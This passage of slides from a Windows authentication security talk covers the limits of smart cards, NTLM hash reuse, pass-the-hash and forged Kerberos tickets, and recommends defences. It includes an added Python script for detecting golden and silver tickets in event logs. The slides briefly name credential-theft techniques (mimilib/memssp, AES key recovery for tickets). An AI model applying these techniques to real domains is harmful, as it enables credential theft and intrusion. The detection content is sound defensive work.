Thinking that a PIN code or picture password is better?
– You're a l33t company, you use fingerprints on Windows 8?
– The password sits in SYSTEM's local vault... you know? Same thing as a password in the registry...
mimilib & memssp
– Grab all passwords!
• 38. Demo!
• 39. Do Smart Cards Help? (1)
With Windows auth, not really
– High cost
– Painful deployment
– Other benefits (email certs, ID certs for web servers)
Password hashes are randomly generated and stored
– They never change by default
– Useful for PTH
– Password could still be reset
  • One organization set the password after smart card enrollment to the same value for all users (thousands)
– The NTLM hash is handed back to the client inside the Kerberos ticket (the PAC's credential info), so NTLM keeps working after a smart card logon
• 40. Do Smart Cards Help? (2)
Smart cards are only required for INTERACTIVE logon
– Second factor null and void for network logons
– File shares, etc.
Smart cards are considered a stronger form of authentication
– Means somebody could launch a password-guessing attack against the account, possibly lock it
– The account is silently unlocked by a successful smart card logon
– User never notified
– Even then, what the user gets is... Kerberos tickets... usable without the smart card
• 41. What does a compromise really mean?
Need to be honest with ourselves:
– A domain CANNOT BE RECOVERED once it is COMPROMISED
  • ...but very few people can detect when their domain is compromised
– How does the "assume breach" mentality collide with the "10 Immutable Laws of Security"?
– Education
  • If this is the new stance, step up and release actionable guidance for strategic decision makers
    – C-level
    – Security managers
• 42. Next Steps (1)
Not all technical
– Educational
– Strategic
Must give clients the real keys to make the transition easy
– Disabling NTLM has been an option for a long time, but who cares?
  • That, and people like devices such as printers and scanners that use network authentication
– WDigest can be disabled on Windows 7 (KB2871997 plus the WDigest UseLogonCredential registry value set to 0), but who will push the Fix it?
– Using CNG or virtual smart cards, too, but who cares?
  • Most products are not compatible
• 43. Next Steps (2)
Good security must not be a hard option to set AFTER compromise
Give sysadmins / blue teams tools for serious monitoring (the event log is very NT4)
– The recent addition of command-line auditing is a good first step; what's next?
Enhance admin tools to securely manage large deployments
– Provide a secure method for managing local users across an enterprise
– One of the appeals of GPP was user management, although poorly implemented / insecure
Service / feature minimization
– Unix has done this for years
– If you don't need a feature, make it easy to disable / remove
– Issue guidance on what features are required and how to disable those that aren't
• 44. Next Steps (3)
Design services that are breach-resistant
– The advice can't be to rebuild the forest every day / week
– Design services that are more "tamper evident"
  • Alert defenders if key services are touched
  • Develop interesting methods to detect things like the Kerberos attacks
Authentication is hard
– If we had the solution, we'd be rich
– Requires active research
  • Not a one-size-fits-all solution
  • Local authentication != cloud authentication
  • Room for many solutions
• 45. Next Steps (4)
Asymmetric cryptography might be the answer?
– Key exchange is always the problem
  • Figure this one out and you might have a way forward
Hardware integration?
– Critical credentials stored on a crypto chip tied to a particular computer?
Third-party support
– Accept the fact that most environments are heterogeneous
– Printers / scanners / future devices need to authenticate
– Develop proactive solutions for authentication; document and share
• 46. Next Steps (5)
Minimize and learn from previous mistakes
– NTLM weakness = the hash is a password equivalent
– AES keys are currently treated the same way in Windows
  • Recover the AES keys, get a Kerberos ticket, win
– Kerberos design weaknesses have been well documented since the 1990s
  • Designed to minimize authentication traffic / load, not necessarily for security / robustness
• 47. Next Steps (6)
Break with the past
– Backwards compatibility will always get you
– At some point you have to put it out of its misery
Remember that the solution can't be Microsoft-only
– Printers / scanners / etc. need to be able to interact as well
– Design for future network needs as well
• 48. Defensive Measures
It's difficult to get everything correct
– Old adage: defenders have to be right all the time, attackers only have to be right once
– Try to move towards "secure by default" or "fail closed"
  • Or at least give enterprises the capability to do so if they choose
Best measures are usually detective
– Know what normal looks like for privileged users
– Spot the abnormalities
  • Defensive staff know when an admin is on vacation or off shift
– Enhance auditing capabilities and increase alerting
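One shape the "interesting methods to detect the Kerberos attacks" (slide 44) and the "spot the abnormalities" advice (slide 48) can take, as an added example that is not code from the talk: three cheap checks over Windows Security events, run here against constructed records that mimic the EventData fields of 4769 (TGS request, logged on the DC) and 4624 (logon, logged on the target server) as a SIEM would export them. The directory snapshot, host names and accounts are constructed too. The checks lean on the talk's own observations: a ticket forged from an NTLM hash is RC4 (etype 0x17) even when the account has AES keys; a golden ticket can name a user that does not exist; and a silver ticket needs 0 KDC accesses, so the server logs a Kerberos logon the DC never issued a service ticket for.

```python
"""Hunting forged Kerberos tickets in Security events. Added example, not from the talk;
all events, hosts and accounts below are constructed."""

RC4_HMAC = "0x17"  # TicketEncryptionType for rc4-hmac; AES is 0x11 / 0x12

# Constructed directory snapshot: account -> has AES keys (password set at
# 2008+ functional level), so an RC4 service ticket for it is unexpected.
DIRECTORY = {"Administrator": True, "alice": True, "svc_backup": False}

# Constructed sample events (a real feed carries many more fields).
SAMPLE_EVENTS = [
    {"EventID": 4769, "Computer": "DC01", "TargetUserName": "alice@BLUE.LOCAL",
     "ServiceName": "CLIENT$", "TicketEncryptionType": "0x12"},
    {"EventID": 4624, "Computer": "CLIENT", "TargetUserName": "alice",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos"},
    # Ticket for the domain Administrator built from an RC4 (NTLM) key.
    {"EventID": 4769, "Computer": "DC01", "TargetUserName": "Administrator@BLUE.LOCAL",
     "ServiceName": "CLIENT$", "TicketEncryptionType": "0x17"},
    {"EventID": 4624, "Computer": "CLIENT", "TargetUserName": "Administrator",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos"},
    # Golden ticket naming a user that was never created.
    {"EventID": 4769, "Computer": "DC01", "TargetUserName": "ghost@BLUE.LOCAL",
     "ServiceName": "FILESRV$", "TicketEncryptionType": "0x17"},
    # Silver ticket: the file server sees a Kerberos logon, DC01 saw no TGS-REQ.
    {"EventID": 4624, "Computer": "FILESRV", "TargetUserName": "svc_backup",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos"},
]


def _account(name):
    """Normalise 'user@REALM' or 'user' to a lower-case sAMAccountName."""
    return name.split("@")[0].lower()


def find_suspicious(events, directory):
    """Return {rule, account, computer} findings for one correlation window.
    Service tickets live 10 hours by default, so the window should be at least that,
    and the 4769 feed must come from every DC the clients can reach."""
    known = {k.lower(): aes for k, aes in directory.items()}
    findings = []
    tgs_issued_for = set()
    for e in events:                       # pass 1: what the KDC actually issued
        if e["EventID"] != 4769:
            continue
        acct = _account(e["TargetUserName"])
        tgs_issued_for.add(acct)
        if acct.endswith("$"):             # computer accounts are out of scope here
            continue
        if acct not in known:
            findings.append({"rule": "ticket-for-unknown-account",
                             "account": acct, "computer": e["Computer"]})
        elif e["TicketEncryptionType"] == RC4_HMAC and known[acct]:
            findings.append({"rule": "rc4-ticket-for-aes-account",
                             "account": acct, "computer": e["Computer"]})
    for e in events:                       # pass 2: Kerberos network logons on servers
        if e["EventID"] != 4624 or e.get("LogonType") != "3":
            continue
        if e.get("AuthenticationPackageName") != "Kerberos":
            continue
        acct = _account(e["TargetUserName"])
        if acct.endswith("$") or acct in tgs_issued_for:
            continue
        findings.append({"rule": "kerberos-logon-without-tgs",
                         "account": acct, "computer": e["Computer"]})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS, DIRECTORY):
        print(f"{f['rule']:28} {f['account']:14} seen on {f['computer']}")
```

The RC4 rule only means something once the domain really has AES keys (2008+ functional level and passwords changed since), the unknown-account rule fires on stale directory snapshots as readily as on golden tickets, and the no-TGS rule needs 4769 from all domain controllers plus tolerance for clock skew; treat each hit as a lead for the "know what normal looks like" review, not as proof.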
• 49. That's all, folks!
We would especially like to thank:
– Will Peteroy
– Joe Bialek
– Akila Srinivasan
– The 80's (first versions of Kerberos)
– The 90's (first versions of NTLM)
– All (previous?) Microsoft architects for making it possible
Seriously, we know it's hard to change things in security with backward compatibility and business in the balance!
• 50. Websites, Source Codes & Contact
Chris CAMPBELL
  blog     http://obscuresecurity.blogspot.com
  source   https://github.com/obscuresec
  contact  @obscuresec / obscuresec@gmail.com
Benjamin DELPY
  blog     http://blog.gentilkiwi.com
  mimikatz http://blog.gentilkiwi.com/mimikatz
  source   https://github.com/gentilkiwi/mimikatz
  contact  @gentilkiwi / benjamin@gentilkiwi.com
Skip DUCKWALL
  blog     http://passing-the-hash.blogspot.com
  source   https://github.com/gentilkiwi/mimikatz
  contact  @passingthehash / exorcyst@gmail.com